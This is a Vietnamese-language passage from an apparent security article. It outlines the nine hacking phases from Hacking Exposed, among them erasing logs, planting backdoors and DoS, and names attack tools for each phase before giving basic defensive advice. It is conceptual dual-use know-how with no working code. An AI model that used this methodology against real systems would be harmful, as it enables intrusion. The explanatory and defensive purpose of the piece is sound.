Trong trưòng hợp các bản sửa lỗi bị chậm trễ cũng có thể làm hại đến công tác bảo mật. Các khám phá lỗ hổng hoạt động với tốc độ "ánh sáng" trong giới “chúng ta” . Từ các mail list hay diễn đàn như www.hackervn.net thì bọn họ chia xẻ với nhau những thông tin mới nhất, trong khi đó với sự chậm chạp của nhà cung cấp thì các hệ thống đã bị phá hoại chỉ sau một đêm.
Tư vấn không đủ trình độ:
Nếu như tất cả các vấn đề ở trên đều đựơc giải quyết thì bạn doanh nghiệp lại vấp phải một vấn đề khác là thiếu những các nhân đáng tin tưởng. Có thể thu thập một đỗi ngũ kỹ sư, quản trị và lập trình viên đủ trình độ, nhưng không dễ tìm ra các chuyên gia bảo mật giỏi, vì có lẽ bọn họ đã đi làm hacker hết cả rồi!.
Và không thể đào tạo đội ngũ chuyên gia bảo mật trong vài ngày. Đó là một quá trình rất dài, phải bắt đầu từ các kiến thức cơ bản như TCP/IP, phần cứng, hệ điều hành, mã hoá và lập trình. Nhưng như vậy mới chỉ đủ cho các hiểu biết sơ đẳng về bảo mật.
Việc thiếu nhân sự làm cho các chương trình về bảo mật trong doanh nghiệp bị xao lãng hoặc đi sai đường. Không có các chính sách về bảo mật hoặc nếu có thì không được hoàn chỉnh. Chính điều đó làm cho hệ thống của bạn bị tổn thương trước các cuộc tấn công.
Vậy thì các hacker xâm nhập vào hệ thống như thế nào?
Có thể vài người muốn kiện tôi vì việc viết ra những tin này. Tại sao? Đơn giản là bởi vì những thông tin sẽ được đưa ra có thể đem đến nhiều tác hại hơn là ích lợi (but not for hackers). Tôi không nói rằng những thông tin đó không thể bị lợi dụng, nhưng chỉ những người muốn bảo vệ chính mình, họ sẽ tìm thấy những gì họ muốn. Những thông tin này có đầy rẫy trên web và tất cả hacker đều biết. Còn những người dùng bình thường thì không cần cố gắng để làm quen với chúng, vì chúng quá nguy hiểm. Bài viết chỉ đem đến cho họ một chút hiểu biết về những gì mà họ mong muốn.
Hacking có 9 bước đã được đề cập đến trong cuốn sách Hacking Exposed, bao gồm:
(chỗ này để đại tiếng Anh cho dễ hiểu)
FootPrinting
Scanning
Enumeration
Gaining Access
Escalating Privileges
Pilfering
Covering Tracks
Creating "Back Doors"
Denial of Service
1. FootPrinting:
Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thông tin chính thức có liên quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm những thông tin đó.
2. Scanning:
Khi đã có nhưng thông tin đó rồi, thì tiếp đến là đánh giá và định danh những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro, siphon, fscan và còn rất nhiều nữa.
3. Enumeration:
Bước thứ ba là tìm kiếm những tài nguyên được bảo vệ kém, hoạch tài khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dich vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này.
4. Gaining Access:
Bây giờ kẻ xâm nhập sẽ tìm cách truy cập vào mạng bằng những thông tin có đựơc ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn công vào lỗi tràn bộ đệm ( xem thêm tại đây ), lấy và giả mã file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các tool thường được sử dụng ở bước này là NAT, podium, hoặc L0pht.
5. Escalating Privileges:
Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper là hai chương trình crack password rất hay được sử dụng.
6. Pilfering:
Thêm một lần nữa các máy tìm kiếm lại đựơc sử dụng để tìm các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.
7. Covering Tracks:
Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm nhập hoặc có biết cũng không tìm ra kẻ xâm nhập là ai.
8. Creating "Back Doors":
Hacker để lại "Back Doors", tức là một cơ chế cho phép hacker truy cập trở lại bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là các loại Trojan, keylog…
9. Denial of Service (aka DoS):
Nếu không thành công trong việc xâm nhập, thì DoS là phương tiện cuối cùng để tấn công hệ thống. Nếu hệ thống không được cấu hình đúng cách, nó sẽ bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác thì DoS sẽ làm cho hệ thống không hoạt động được nữa. Các công cụ hay được sử dụng để tấn công DoS là trin00, Pong Of Death, teardrop, và các loại nuker, flooder.
Vậy thì làm thế nào để tự bảo vệ?
Nếu bạn là người dùng cuối, bạn có thể hỏi như vậy. Đơn giản là vì không có gì 100% an toàn. Các lỗ hổng mới được tìm ra hàng ngày, các phương pháp mới cũng hình thành sau một đêm. Nhiều khi bạn nghĩ là an toàn, nhưng đến lúc nhận ra là bị xâm phạm thì đã muộn rồi.
Nhưng ở đây cũng có một vài hướng dẫn để bạn có thể tự bảo vệ mình:
Cài đặt firewall tốt và đảm bảo rằng nó được cấu hình chính xác.
Tắt tất cả các ứng dụng và dịch vụ của hệ thống mà bạn không sử dụng.
Không bao giờ mở những file đến từ người lạ.
Cài đặt các chương trinh diệt virus tốt và được cập nhật thường xuyên.
Cài đăt các bản sửa lỗi mới nhất và tham gia vào các hệ thống tin trực tuyến về bảo mật để thong tin được cập nhật kịp thời.
Có một chính sách bảo mật riêng cho mình.
Đảm bảo một hệ thống mạng tốt để tránh rủi ro.
Đầu tư các thiết bị phần cứng bảo mật tốt (money).
Sẽ không có một cuốn Kinh thánh nào về bảo mật cho bạn, tất cả chỉ là những chỉ dẫn phổ thông, nhưng đa phần người dung đã không để ý đến chúng và hâu quả là họ đã bị nguy hiểm. Không thể chống lại hack được nhưng có thể giảm thiểu được nó :P
Bảo mật không phải là câu chuyện vui. Không có bảo mật thì các máy tính nối mạng sẽ bị tàn phá, Nhũng lỗ hổng và các công cụ đã được thông báo thì nó sẽ không chỉ là thông báo, mà nó là điềm báo trước điều gì sẽ xảy ra.
Một vài lời khuyên:
Nếu bạn muốn học “Hack” thì còn phải đọc nhiều hơn nữa.
Hacking không chỉ là xâm nhập trái phép vào hệ thống máy tính. Nó còn hơn thế nữa. Nó là thách thức mà bạn phải trải qua. Nó không chỉ đơn giản như những ví dụ mà tôi đã đề cập đến.
Bất cứ điều gì về hacking mà bạn đọc được đều có thể được sử dụng với mục đích tốt hay xấu. Tôi khuyên bạn nên xác đinh được mục đích trước khi chạy thử một chương trinh hack nào đó. Trở thành một hacker giỏi cũng không phải là một điều xấu, mà ngược lại nó còn rất tốt vì nhiều lý do. Vì vậy bạn nên cố gắng giúp đỡ những người bạn gặp để trở thành một hacker tốt. Có rất nhiều người không có một khái niệm nào về sự xâm nhập từ bên ngoài vào máy tính của họ.